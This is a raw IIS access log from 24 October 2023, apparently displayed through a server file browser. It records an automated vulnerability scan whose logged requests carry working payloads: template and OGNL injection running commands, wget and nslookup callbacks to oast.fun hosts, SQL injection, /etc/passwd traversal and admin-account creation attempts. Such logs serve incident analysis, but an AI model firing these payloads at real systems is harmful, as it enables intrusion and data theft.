????
Current Path : C:/inetpub/logs/LogFiles/W3SVC18/ |
Current File : C:/inetpub/logs/LogFiles/W3SVC18/u_ex231024.log |
#Software: Microsoft Internet Information Services 10.0 #Version: 1.0 #Date: 2023-10-24 00:00:02 #Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken 2023-10-24 00:00:02 103.153.214.94 POST /UploadFileData action=upload_file&filename=../2XAXVtSCRizvOL6z4ovIgbjDVIr.jsp 443 - 95.111.241.172 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/34.0.1847.137+Safari/4E423F - 405 0 1 388 2023-10-24 00:00:05 103.153.214.94 GET /general/weibo/javascript/uploadify/uploadify.php - 443 - 95.111.241.172 Mozilla/5.0+(Windows+NT+6.2;+WOW64)+AppleWebKit/537.36+(KHTML+like+Gecko)+Chrome/44.0.2403.155+Safari/537.36 - 200 0 0 214 2023-10-24 00:00:05 103.153.214.94 POST /general/weibo/javascript/uploadify/uploadify.php - 443 - 95.111.241.172 Mozilla/5.0+(Windows+NT+10.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/71.0.3578.98+Safari/537.36 - 405 0 1 207 2023-10-24 00:00:06 103.153.214.94 GET /attachment/personal/_temp.php - 443 - 95.111.241.172 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_3)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/54.0.2866.71+Safari/537.36 - 200 0 0 210 2023-10-24 00:00:09 103.153.214.94 POST /servlet/FileReceiveServlet - 443 - 95.111.241.172 Mozilla/5.0+(X11;+Ubuntu;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/55.0.2919.83+Safari/537.36 - 405 0 1 209 2023-10-24 00:00:09 103.153.214.94 GET /ZD8TC.jsp - 443 - 95.111.241.172 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.0+Safari/537.36 - 200 0 0 205 2023-10-24 00:00:13 103.153.214.94 GET /R9iPortal/2XAXVtSCRizvOL6z4ovIgbjDVIr.jsp - 443 - 95.111.241.172 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/70.0.3538.77+Safari/537.36 - 200 0 0 205 2023-10-24 00:00:15 103.153.214.94 GET /catalog-portal/ui/oauth/verify error&deviceUdid=%24%7b%22%66%72%65%65%6d%61%72%6b%65%72%2e%74%65%6d%70%6c%61%74%65%2e%75%74%69%6c%69%74%79%2e%45%78%65%63%75%74%65%22%3f%6e%65%77%28%29%28%22%63%61%74%20%2f%65%74%63%2f%68%6f%73%74%73%22%29%7d 443 - 95.111.241.172 Mozilla/5.0+(Windows+NT+6.3;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2049.0+Safari/537.36 - 200 0 0 207 2023-10-24 00:00:34 103.153.214.94 POST /ajax/getemaildata.php DontCheckLogin=1 443 - 95.111.241.172 Mozilla/5.0+(Windows+NT+10.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/45.0.2454.93+Safari/537.36 - 405 0 1 213 2023-10-24 00:00:36 103.153.214.94 GET /yyoa/common/js/menu/test.jsp doType=101&S1=(SELECT%20md5(999999999)) 443 - 95.111.241.172 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 - 200 0 0 211 2023-10-24 00:00:41 103.153.214.94 POST /aim/equipmap/accept.jsp - 443 - 95.111.241.172 Mozilla/5.0+(Windows+NT+6.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2228.0+Safari/537.36 - 405 0 1 209 2023-10-24 00:00:46 103.153.214.94 POST /OA_HTML/BneViewerXMLService bne:uueupload=TRUE 443 - 95.111.241.172 Mozilla/5.0+(Windows+NT+6.3;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2049.0+Safari/537.36 - 405 0 1 206 2023-10-24 00:00:47 103.153.214.94 GET /OA_CGI/FNDWRR.exe - 443 - 95.111.241.172 Mozilla/5.0+(Windows+NT+6.4;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2225.0+Safari/537.36 - 200 0 0 211 2023-10-24 00:00:49 103.153.214.94 POST /OA_HTML/BneViewerXMLService bne:uueupload=TRUE 443 - 95.111.241.172 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.3319.102+Safari/537.36 - 405 0 1 207 2023-10-24 00:00:54 103.153.214.94 GET /2XAXWHqBSKfaZuu70KEXaAI1zF6.jsp - 443 - 95.111.241.172 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2224.3+Safari/537.36 - 200 0 0 205 2023-10-24 00:01:33 103.153.214.94 POST /ServiceDispatcherServlet - 443 - 95.111.241.172 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_2)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1944.0+Safari/537.36 - 405 0 1 208 2023-10-24 00:01:33 103.153.214.94 GET /ncupload/n2d19a.jsp - 443 - 95.111.241.172 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_3)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/54.0.2866.71+Safari/537.36 - 200 0 0 214 2023-10-24 00:01:33 103.153.214.94 POST /uapim/upload/grouptemplet groupid=28&fileType=jsp 443 - 95.111.241.172 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 - 405 0 1 207 2023-10-24 00:01:35 103.153.214.94 POST /functionRouter - 443 - 95.111.241.172 Mozilla/5.0+(Windows+NT+6.3;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2226.0+Safari/537.36 - 405 0 1 205 2023-10-24 00:01:35 103.153.214.94 GET /uapim/static/pages/28/head.jsp - 443 - 95.111.241.172 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_2)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/52.0.2762.73+Safari/537.36 - 200 0 0 207 2023-10-24 00:01:46 103.153.214.94 POST /modules/appagebuilder/apajax.php rand=9496724652122 443 - 95.111.241.172 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.3319.102+Safari/537.36 https://bcvt.kontum.gov.vn 405 0 1 206 2023-10-24 00:01:46 103.153.214.94 GET /modules/appagebuilder/config.xml - 443 - 95.111.241.172 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.0+Safari/537.36 - 200 0 0 206 2023-10-24 00:01:50 103.153.214.94 POST /servlet/~baseapp/nc.message.bs.NCMessageServlet - 443 - 95.111.241.172 Mozilla/5.0+(Windows+NT+6.4;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2225.0+Safari/537.36 - 405 0 1 206 2023-10-24 00:01:51 103.153.214.94 POST /servlet/~baseapp/nc.message.bs.NCMessageServlet - 443 - 95.111.241.172 Mozilla/5.0+(Windows+NT+10.0;+rv:78.0)+Gecko/20100101+Firefox/78.0 - 405 0 1 1077 2023-10-24 00:06:10 103.153.214.94 POST /actuator/gateway/routes/2XAKRDucp8NYfdFmpEM4q6gofOj - 443 - 95.111.241.172 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_2)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/52.0.2762.73+Safari/537.36 - 405 0 1 211 2023-10-24 00:06:12 103.153.214.94 POST /actuator/gateway/refresh - 443 - 95.111.241.172 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.0+Safari/537.36 - 405 0 1 212 2023-10-24 00:06:16 103.153.214.94 DELETE /actuator/gateway/routes/2XAKRDucp8NYfdFmpEM4q6gofOj - 443 - 95.111.241.172 Mozilla/5.0+(Windows+NT+10.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 405 0 1 206 2023-10-24 00:07:41 103.153.214.94 GET /aj.html a=devi 443 - 95.111.241.172 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_10_1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2062.124+Safari/537.36 - 200 0 0 208 2023-10-24 00:10:44 103.153.214.94 GET /zabbix/index_sso.php - 443 - 95.111.241.172 Mozilla/5.0+(Windows+NT+10.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 200 0 0 210 2023-10-24 00:10:44 103.153.214.94 GET /index_sso.php - 443 - 95.111.241.172 Mozilla/5.0+(X11;+Ubuntu;+Linux+i686+on+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/53.0.2820.59+Safari/537.36 - 200 0 0 207 2023-10-24 00:10:44 103.153.214.94 GET /vcac/ - 443 - 95.111.241.172 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_10_1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2062.124+Safari/537.36 - 200 0 0 208 2023-10-24 00:10:45 103.153.214.94 GET /vcac/ original_uri=https://bcvt.kontum.gov.vn%2Fvcac 443 - 95.111.241.172 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_3)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.1916.47+Safari/537.36 - 200 0 0 207 2023-10-24 00:12:14 103.153.214.94 POST /cms/content/list - 443 - 95.111.241.172 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.3319.102+Safari/537.36 - 405 0 1 208 2023-10-24 00:13:05 103.153.214.94 GET / location=search 443 - 95.111.241.172 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 - 200 0 0 214 2023-10-24 00:14:49 103.153.214.94 GET /plugin - 443 - 95.111.241.172 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2224.3+Safari/537.36 - 200 0 0 209 2023-10-24 00:15:22 103.153.214.94 POST /admin/login.php - 443 - 95.111.241.172 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.2309.372+Safari/537.36 - 405 0 1 210 2023-10-24 00:16:41 103.153.214.94 POST /login.php - 443 - 95.111.241.172 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.0+Safari/537.36 - 405 0 1 210 2023-10-24 00:16:53 103.153.214.94 POST /api.php - 443 - 95.111.241.172 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_4)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/49.0.2656.18+Safari/537.36 - 404 0 2 207 2023-10-24 00:18:15 103.153.214.94 POST /apisix/batch-requests - 443 - 95.111.241.172 Mozilla/5.0+(Windows+NT+6.2;+WOW64)+AppleWebKit/537.36+(KHTML+like+Gecko)+Chrome/44.0.2403.155+Safari/537.36 - 404 0 2 409 2023-10-24 00:18:15 103.153.214.94 GET /api/2XAKQyja1HQvfsvEEvJBFjGdC3k - 443 - 95.111.241.172 Mozilla/5.0+(Windows+NT+10.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 404 0 2 221 2023-10-24 00:19:59 103.153.214.94 POST / - 443 - 95.111.241.172 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 - 405 0 1 215 2023-10-24 00:20:01 103.153.214.94 GET / class.module.classLoader.resources.context.configFile=http://ckr701l02n34v9l7kpngpyt11p8fuq1n5.oast.fun&class.module.classLoader.resources.context.configFile.content.aaa=xxx 443 - 95.111.241.172 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.0+Safari/537.36 - 200 0 0 209 2023-10-24 00:20:01 103.153.214.94 POST / - 443 - 95.111.241.172 Mozilla/5.0+(Windows+NT+6.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2228.0+Safari/537.36 - 405 0 1 217 2023-10-24 00:20:03 103.153.214.94 GET / class.module.classLoader.resources.context.configFile=https://ckr701l02n34v9l7kpng6cb9dd349j658.oast.fun&class.module.classLoader.resources.context.configFile.content.aaa=xxx 443 - 95.111.241.172 Mozilla/5.0+(Windows+NT+6.3;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2049.0+Safari/537.36 - 200 0 0 211 2023-10-24 00:25:50 103.153.214.94 POST /cgi-bin/nightled.cgi - 443 - 95.111.241.172 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_3)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.1916.47+Safari/537.36 - 405 0 1 211 2023-10-24 00:26:07 103.153.214.94 POST /geoserver/wms - 443 - 95.111.241.172 Mozilla/5.0+(Windows+NT+10.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 405 0 1 208 2023-10-24 00:26:46 103.153.214.94 GET /cgi-bin/mesh.cgi page=upgrade&key=;%27wget+http://ckr701l02n34v9l7kpngsi8i9isruj668.oast.fun;%27 443 - 95.111.241.172 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_3)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/54.0.2866.71+Safari/537.36 - 200 0 0 210 2023-10-24 00:33:01 103.153.214.94 GET /cgi-bin/touchlist_sync.cgi IP=;wget+http://ckr701l02n34v9l7kpngjntxostos4b6q.oast.fun; 443 - 95.111.241.172 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_3)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/54.0.2866.71+Safari/537.36 - 200 0 0 586 2023-10-24 00:36:34 103.153.214.94 GET /mdiy/dict/listExcludeApp query=1&dictType=1&orderBy=1/**/or/**/updatexml(1,concat(0x7e,md5('999999999'),0x7e),1)/**/or/**/1 443 - 95.111.241.172 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/34.0.1866.237+Safari/537.36 - 200 0 0 209 2023-10-24 00:38:15 103.153.214.94 GET /Admin/Access/Setup/Default.aspx Action=createadministrator&adminusername=g94kju&adminpassword=MdsZ9O&adminemail=test@test.com&adminname=test 443 - 95.111.241.172 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_4)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/49.0.2656.18+Safari/537.36 - 301 0 0 209 2023-10-24 00:38:46 103.153.214.94 GET /cgi-bin/downloadFlile.cgi payload=`ls>../2XAKRcaVbq46wutmJpWYEJmPInM` 443 - 95.111.241.172 Mozilla/5.0+(Windows+NT+6.4;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2225.0+Safari/537.36 - 200 0 0 209 2023-10-24 00:38:46 103.153.214.94 GET /2XAKRcaVbq46wutmJpWYEJmPInM - 443 - 95.111.241.172 Mozilla/5.0+(Windows+NT+6.3;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2226.0+Safari/537.36 - 200 0 0 206 2023-10-24 00:40:36 103.153.214.94 POST /admin/uploads.php id=1 443 - 95.111.241.172 Mozilla/5.0+(Windows+NT+6.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2228.0+Safari/537.36 - 405 0 1 213 2023-10-24 00:41:43 103.153.214.94 GET /admin/ajax/avatar.php id=-1+union+select+md5(999999999)%23 443 - 95.111.241.172 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.2309.372+Safari/537.36 - 301 0 0 210 2023-10-24 00:44:27 103.153.214.94 POST /dologin.action - 443 - 95.111.241.172 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 - 405 0 1 210 2023-10-24 00:46:26 103.153.214.94 GET /login redirect=%2F 443 - 95.111.241.172 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.2117.157+Safari/537.36 - 200 0 0 208 2023-10-24 00:46:53 103.153.214.94 GET /${(#a=@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec("whoami").getInputStream(),"utf-8")).(@com.opensymphony.webwork.ServletActionContext@getResponse().setHeader("X-Cmd-Response",#a))}/ - 443 - 95.111.241.172 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_4)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/49.0.2656.18+Safari/537.36 - 200 0 0 207 2023-10-24 00:46:55 103.153.214.94 GET /${@java.lang.Runtime@getRuntime().exec("nslookup+ckr701l02n34v9l7kpngtuni3jwbooxi3.oast.fun")}/ - 443 - 95.111.241.172 Mozilla/5.0+(Windows+NT+10.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 200 0 0 206 2023-10-24 00:49:24 103.153.214.94 POST /OASREST/v2/authenticate - 443 - 95.111.241.172 Mozilla/5.0+(Windows+NT+10.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 405 0 1 211 2023-10-24 00:52:28 103.153.214.94 POST /api/content/ - 443 - 95.111.241.172 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_10_1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2062.124+Safari/537.36 - 405 0 1 221 2023-10-24 00:52:30 103.153.214.94 GET /2XAKROIzhgBQUw7lGRMQp6LaQR4.jsp - 443 - 95.111.241.172 Mozilla/5.0+(Windows+NT+6.3;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2225.0+Safari/537.36 - 200 0 0 206 2023-10-24 00:52:45 103.153.214.94 GET /elfinder/php/connector.minimal.php cmd=file&target=l1_<@base64>/var/www/html/elfinder/files//..//..//..//..//..//../etc/passwd<@/base64>&download=1 443 - 95.111.241.172 Mozilla/5.0+(Windows+NT+6.2;+WOW64)+AppleWebKit/537.36+(KHTML+like+Gecko)+Chrome/44.0.2403.155+Safari/537.36 - 200 0 0 642 2023-10-24 00:53:43 103.153.214.94 GET /photo/combine.php type=javascript&g=core-r7rules/../../../hello.php. 443 - 95.111.241.172 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.0+Safari/537.36 - 200 0 0 212 2023-10-24 00:55:32 103.153.214.94 GET /mims/updatecustomer.php customer_number=-1'%20UNION%20ALL%20SELECT%20NULL,NULL,CONCAT(md5(999999999),1,2),NULL,NULL,NULL,NULL,NULL,NULL' 443 - 95.111.241.172 Mozilla/5.0+(Windows+NT+6.4;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2225.0+Safari/537.36 - 200 0 0 210 2023-10-24 01:03:13 103.153.214.94 POST /classes/Master.php f=delete_item 443 - 95.111.241.172 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_4)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/49.0.2656.18+Safari/537.36 - 405 0 1 210 2023-10-24 01:05:04 103.153.214.94 POST /classes/Master.php f=delete_supplier 443 - 95.111.241.172 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.0+Safari/537.36 - 405 0 1 210 2023-10-24 01:05:09 103.153.214.94 GET /admin/ajax/pages.php id=(sleep(6)) 443 - 95.111.241.172 Mozilla/5.0+(Windows+NT+6.3;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2226.0+Safari/537.36 - 301 0 0 212 2023-10-24 01:06:19 103.153.214.94 POST /api/agent/tabs/agentData - 443 - 95.111.241.172 Mozilla/5.0+(Windows+NT+6.3;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2225.0+Safari/537.36 - 404 0 2 221 2023-10-24 01:10:01 103.153.214.94 POST /admin/index.php - 443 - 95.111.241.172 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.0+Safari/537.36 - 405 0 1 238 2023-10-24 01:10:01 103.153.214.94 GET /admin/dashboard.php - 443 - 95.111.241.172 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 - 301 0 0 211 2023-10-24 01:10:17 103.153.214.94 POST /dfsms/index.php - 443 - 95.111.241.172 Mozilla/5.0+(Windows+NT+6.3;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2225.0+Safari/537.36 - 405 0 1 209 2023-10-24 01:10:17 103.153.214.94 GET /dfsms/add-category.php - 443 - 95.111.241.172 Mozilla/5.0+(Windows+NT+6.3;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2049.0+Safari/537.36 - 200 0 0 207 2023-10-24 01:10:29 103.153.214.94 GET /page id=2XAKR0k0EMA3WSWXEEs1Dy8QUhj&settings[view%20options][outputFunctionName]=x;process.mainModule.require(%27child_process%27).execSync(%27wget+http://ckr701l02n34v9l7kpngeppcr74xn4877.oast.fun%27);s 443 - 95.111.241.172 Mozilla/5.0+(Windows+NT+10.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 200 0 0 206 2023-10-24 01:10:31 103.153.214.94 POST /conf_mail.php - 443 - 95.111.241.172 Mozilla/5.0+(Windows+NT+6.3;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2049.0+Safari/537.36 - 405 0 1 752 2023-10-24 01:11:11 103.153.214.94 POST /ccms/index.php - 443 - 95.111.241.172 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/34.0.1847.137+Safari/4E423F - 405 0 1 208 2023-10-24 01:11:13 103.153.214.94 GET /ccms/dashboard.php - 443 - 95.111.241.172 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.2117.157+Safari/537.36 - 200 0 0 206 2023-10-24 01:14:49 103.153.214.94 POST /scgi-bin/platform.cgi - 443 - 95.111.241.172 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/34.0.1847.137+Safari/4E423F - 405 0 1 801 2023-10-24 01:14:49 103.153.214.94 POST /scgi-bin/platform.cgi - 443 - 95.111.241.172 Mozilla/5.0+(Windows+NT+6.4;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2225.0+Safari/537.36 - 405 0 1 206 2023-10-24 01:15:33 103.153.214.94 POST /fileupload/toolsAny - 443 - 95.111.241.172 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 - 405 0 1 210 2023-10-24 01:15:35 103.153.214.94 GET /authenticationendpoint/2xakr9zekuff1mt4sucvrcit2sh.jsp - 443 - 95.111.241.172 Mozilla/5.0+(Windows+NT+6.4;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2225.0+Safari/537.36 - 200 0 0 209 2023-10-24 01:16:51 103.153.214.94 GET /logfile d=crossdomain.xml 443 - 95.111.241.172 Mozilla/5.0+(X11;+Ubuntu;+Linux+i686+on+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/53.0.2820.59+Safari/537.36 - 200 0 0 212 2023-10-24 01:17:04 103.153.214.94 GET /dms/admin/accounts/payment_history.php account_id=2%27 443 - 95.111.241.172 Mozilla/5.0+(X11;+Ubuntu;+Linux+i686+on+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/53.0.2820.59+Safari/537.36 - 200 0 0 208 2023-10-24 01:20:05 103.153.214.94 POST /ztp/cgi-bin/handler - 443 - 95.111.241.172 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_10_1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2062.124+Safari/537.36 - 405 0 1 210 2023-10-24 01:21:07 103.153.214.94 POST /app/options.py - 443 - 95.111.241.172 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2224.3+Safari/537.36 https://bcvt.kontum.gov.vn/app/login.py 405 0 1 210 2023-10-24 01:21:43 103.153.214.94 GET /card_scan.php No=123&ReaderNo=`sleep%207`&CardFormatNo=123 443 - 95.111.241.172 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/34.0.1847.137+Safari/4E423F - 200 0 0 208 2023-10-24 01:26:57 103.153.214.94 GET /SAAS/t/_/;/WEB-INF/web.xml - 443 - 95.111.241.172 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_4)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/49.0.2656.18+Safari/537.36 - 200 0 0 209 2023-10-24 01:27:54 103.153.214.94 POST /classes/Master.php f=delete_request 443 - 95.111.241.172 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/34.0.1847.137+Safari/4E423F - 405 0 1 209 2023-10-24 01:28:33 103.153.214.94 GET /pfblockerng/www/index.php - 443 - 95.111.241.172 - - 200 0 0 208 2023-10-24 01:29:09 103.153.214.94 POST /classes/Master.php f=delete_team 443 - 95.111.241.172 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_3)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/54.0.2866.71+Safari/537.36 - 405 0 1 208 2023-10-24 01:30:47 103.153.214.94 POST /classes/Master.php f=delete_inquiry 443 - 95.111.241.172 Mozilla/5.0+(Windows+NT+6.3;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2049.0+Safari/537.36 - 405 0 1 211 2023-10-24 01:33:19 103.153.214.94 GET /i3geo/exemplos/codemirror.php pagina=../../../../../../../../../../../../../../../../../etc/passwd 443 - 95.111.241.172 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.0+Safari/537.36 - 200 0 0 208 2023-10-24 01:33:30 103.153.214.94 GET /cgi-bin-hax/ExportSettings.sh - 443 - 95.111.241.172 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_3)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.1916.47+Safari/537.36 - 200 0 0 206 2023-10-24 01:33:46 103.153.214.94 POST /hms/doctor/ - 443 - 95.111.241.172 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_4)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/49.0.2656.18+Safari/537.36 - 405 0 1 206 2023-10-24 01:34:10 103.153.214.94 GET /sap/admin/public/default.html - 443 - 95.111.241.172 - - 200 0 0 209 2023-10-24 01:34:12 103.153.214.94 GET / - 443 - 95.111.241.172 - - 200 0 0 208 2023-10-24 01:35:44 103.153.214.94 GET /backupsettings.dat - 443 - 95.111.241.172 Mozilla/5.0+(Windows+NT+6.2;+WOW64)+AppleWebKit/537.36+(KHTML+like+Gecko)+Chrome/44.0.2403.155+Safari/537.36 - 200 0 0 209 2023-10-24 01:36:11 103.153.214.94 GET /sap/public/bc/ur/Login/assets/corbu/sap_logo.png - 443 - 95.111.241.172 - - 200 0 0 642 2023-10-24 01:36:11 103.153.214.94 GET / - 443 - 95.111.241.172 - - 200 0 0 208 2023-10-24 01:38:52 103.153.214.94 POST /xmlrpc - 443 - 95.111.241.172 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/70.0.3538.77+Safari/537.36 - 405 0 1 790 2023-10-24 01:43:46 103.153.214.94 POST /webapi/auth - 443 - 95.111.241.172 Mozilla/5.0+(Windows+NT+6.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2228.0+Safari/537.36 - 405 0 1 212 2023-10-24 01:45:30 103.153.214.94 POST /vendor/htmlawed/htmlawed/htmLawedTest.php - 443 - 95.111.241.172 